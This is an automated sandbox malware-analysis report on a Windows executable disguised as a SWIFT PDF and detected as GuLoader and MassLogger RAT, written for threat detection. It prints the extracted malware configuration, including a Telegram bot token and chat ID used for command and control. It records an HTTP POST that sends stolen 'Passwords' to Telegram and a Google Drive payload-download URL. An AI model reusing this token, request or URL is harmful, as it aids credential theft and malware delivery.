Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT09181-24_pdf.exe

Overview

General Information

Sample name:SWIFT09181-24_pdf.exe
Analysis ID:1575477
MD5:e47d302ad20a15e7c4816b5e7b236699
SHA1:784795652df30bc7919b8fd74df3056df586c4e8
SHA256:7683dbf87b229a5c18546c930ccf2625f3cf8443a8deddd5c18446fd953e3cd4
Tags:exeGuLoaderuser-threatcat_ch
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SWIFT09181-24_pdf.exe (PID: 3372 cmdline: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe" MD5: E47D302AD20A15E7C4816B5E7B236699)
    • SWIFT09181-24_pdf.exe (PID: 6020 cmdline: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe" MD5: E47D302AD20A15E7C4816B5E7B236699)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2618839198.0000000003647000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T18:30:06.300477+010020577441Malware Command and Control Activity Detected192.168.2.449885149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T18:29:53.504085+010028032742Potentially Bad Traffic192.168.2.449858193.122.130.080TCP
            2024-12-15T18:30:01.941772+010028032742Potentially Bad Traffic192.168.2.449858193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T18:29:45.858880+010028032702Potentially Bad Traffic192.168.2.449837216.58.208.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: SWIFT09181-24_pdf.exe.6020.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: SWIFT09181-24_pdf.exeReversingLabs: Detection: 23%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791D1EC CryptUnprotectData,5_2_3791D1EC
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791D9D9 CryptUnprotectData,5_2_3791D9D9
            Source: SWIFT09181-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49865 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49885 version: TLS 1.2
            Source: SWIFT09181-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791C985h5_2_3791C638
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 37911042h5_2_37910C28
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 37910671h5_2_379103AF
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791EA48h5_2_3791E790
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 37911042h5_2_37910F6F
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791E198h5_2_3791DEE1
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791C041h5_2_3791BD9C
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791B791h5_2_3791B4EC
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 37911042h5_2_37910C1B
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791EEA0h5_2_3791EBF2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791E5F0h5_2_3791E340
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791DD40h5_2_3791DA89
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791C499h5_2_3791C1F2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791BBE9h5_2_3791B944
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791F2F8h5_2_3791F054
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3791B339h5_2_3791B07F
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A65882Dh5_2_3A658650
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6591B7h5_2_3A658650
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then push 00000000h5_2_3A65BDF0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A652C60h5_2_3A6529B8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A655908h5_2_3A655660
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A653510h5_2_3A653268
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A657318h5_2_3A657070
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A651B00h5_2_3A651858
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A654ACAh5_2_3A654820
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6516A8h5_2_3A651400
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6554B0h5_2_3A655208
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6530B8h5_2_3A652E10
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A656EC0h5_2_3A656C18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A653968h5_2_3A6536C0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A657770h5_2_3A6574C8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A651F58h5_2_3A651CB0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A655D60h5_2_3A655AB8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A652808h5_2_3A652560
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A656610h5_2_3A656368
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A654218h5_2_3A653F70
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_3A657B4F
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6523B0h5_2_3A652108
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A6561B8h5_2_3A655F10
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A653DC0h5_2_3A653B18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A656A68h5_2_3A6567C0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A654670h5_2_3A6543C8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A651250h5_2_3A650FA8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 4x nop then jmp 3A655058h5_2_3A654DB0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49885 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d0431f11147Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49858 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49837 -> 216.58.208.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49865 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d0431f11147Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037995000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.000000000745A000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.000000000745A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/0c
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.000000000745A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/Xa
            Source: SWIFT09181-24_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/I
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073D1000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2930306779.0000000008E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073FE000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2809422403.0000000007404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073FE000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2809422403.0000000007404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073ED000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073FE000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2809422403.0000000007404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC&export=download
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: SWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49885 version: TLS 1.2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: SWIFT09181-24_pdf.exe
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_004070415_2_00407041
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_0040686A5_2_0040686A
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00404B305_2_00404B30
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_001543285_2_00154328
